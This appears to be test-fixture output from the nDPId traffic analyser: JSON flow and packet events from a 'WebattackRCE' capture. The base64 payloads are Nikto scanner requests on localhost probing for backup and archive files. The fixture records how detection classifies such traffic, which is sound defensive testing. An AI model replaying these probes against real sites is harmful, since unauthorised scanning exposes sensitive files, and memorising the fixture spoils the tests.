00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":1576420276945,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276945,"pkt":"AAAAAAAAAAAAAAAACABFAAC9GW5AAEAGIst\/AAABfwAAAcLqH5C0ISE5HkW76YAYAED+sQAAAQEICp1m+\/mdZvv5R0VUIC8xLmprcyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":177,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276945,"flow_last_seen":1576420276945,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276945,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49898,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":178,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276947,"flow_last_seen":1576420276947,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276947,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49900,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":1,"flow_last_seen":1576420276947,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276947,"pkt":"AAAAAAAAAAAAAAAACABFAAC9hilAAEAGtg9\/AAABfwAAAcLsH5DmS75z\/EZQIIAYAED+sQAAAQEICp1m+\/udZvv7R0VUIC8xLmprcyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276947,"flow_last_seen":1576420276947,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276947,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49900,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":179,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276949,"flow_last_seen":1576420276949,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276949,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49902,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":1,"flow_last_seen":1576420276949,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276949,"pkt":"AAAAAAAAAAAAAAAACABFAADG8sFAAEAGSW5\/AAABfwAAAcLuH5DZeMrrTWBmVIAYAED+ugAAAQEICp1m+\/2dZvv9R0VUIC8xMjcwMC50YXIubHptYSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":179,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276949,"flow_last_seen":1576420276949,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276949,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49902,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":180,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276950,"flow_last_seen":1576420276950,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276950,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49904,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":1,"flow_last_seen":1576420276950,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276950,"pkt":"AAAAAAAAAAAAAAAACABFAADGIHlAAEAGG7d\/AAABfwAAAcLwH5AJERgjseiOe4AYAED+ugAAAQEICp1m+\/6dZvv+R0VUIC8xMjcwMC50YXIubHptYSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":180,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276950,"flow_last_seen":1576420276950,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276950,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49904,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":181,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276953,"flow_last_seen":1576420276953,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276953,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49906,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":1,"flow_last_seen":1576420276953,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276953,"pkt":"AAAAAAAAAAAAAAAACABFAADB609AAEAGUOV\/AAABfwAAAcLyH5CMSNMc4cqoooAYAED+tQAAAQEICp1m\/AGdZvwBR0VUIC8xMjcwMC50Z3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276953,"flow_last_seen":1576420276953,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276953,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49906,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":182,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276955,"flow_last_seen":1576420276955,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276955,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49908,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":1,"flow_last_seen":1576420276955,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276955,"pkt":"AAAAAAAAAAAAAAAACABFAADBW5ZAAEAG4J5\/AAABfwAAAcL0H5DrXWPDXa4XUYAYAED+tQAAAQEICp1m\/AOdZvwDR0VUIC8xMjcwMC50Z3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276955,"flow_last_seen":1576420276955,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276955,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49908,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276956,"flow_last_seen":1576420276956,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276956,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49910,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":1,"flow_last_seen":1576420276956,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276956,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/O0xAAEAGAOt\/AAABfwAAAcL2H5D9kwMeqK3jJ4AYAED+swAAAQEICp1m\/ASdZvwER0VUIC8xMjcudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":183,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276956,"flow_last_seen":1576420276956,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276956,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49910,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":184,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276957,"flow_last_seen":1576420276957,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276957,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49912,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":1,"flow_last_seen":1576420276957,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276957,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/H8ZAAEAGHHF\/AAABfwAAAcL4H5BlEieUASYiL4AYAED+swAAAQEICp1m\/AWdZvwFR0VUIC8xMjcudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":184,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276957,"flow_last_seen":1576420276957,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276957,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49912,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":185,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276959,"flow_last_seen":1576420276959,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276959,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49914,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":1,"flow_last_seen":1576420276959,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276959,"pkt":"AAAAAAAAAAAAAAAACABFAADIMS5AAEAGCwB\/AAABfwAAAcL6H5D33Al8T9gIjoAYAED+vAAAAQEICp1m\/AedZvwHR0VUIC8xMjdfMF8wXzEudGFyLmd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":185,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276959,"flow_last_seen":1576420276959,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276959,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49914,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":186,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276960,"flow_last_seen":1576420276960,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276960,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49916,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":1,"flow_last_seen":1576420276960,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276960,"pkt":"AAAAAAAAAAAAAAAACABFAADI29RAAEAGYFl\/AAABfwAAAcL8H5B21OOLlrDXQ4AYAED+vAAAAQEICp1m\/AidZvwIR0VUIC8xMjdfMF8wXzEudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276960,"flow_last_seen":1576420276960,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276960,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49916,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":187,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276961,"flow_last_seen":1576420276961,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276961,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49918,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":187,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":1,"flow_last_seen":1576420276961,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276961,"pkt":"AAAAAAAAAAAAAAAACABFAADFGIxAAEAGI6V\/AAABfwAAAcL+H5DvJyDTt9IC\/IAYAED+uQAAAQEICp1m\/AmdZvwJR0VUIC8xMjcuMC4wLjEud2FyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":187,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276961,"flow_last_seen":1576420276961,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276961,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49918,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":188,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276964,"flow_last_seen":1576420276964,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276964,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49920,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
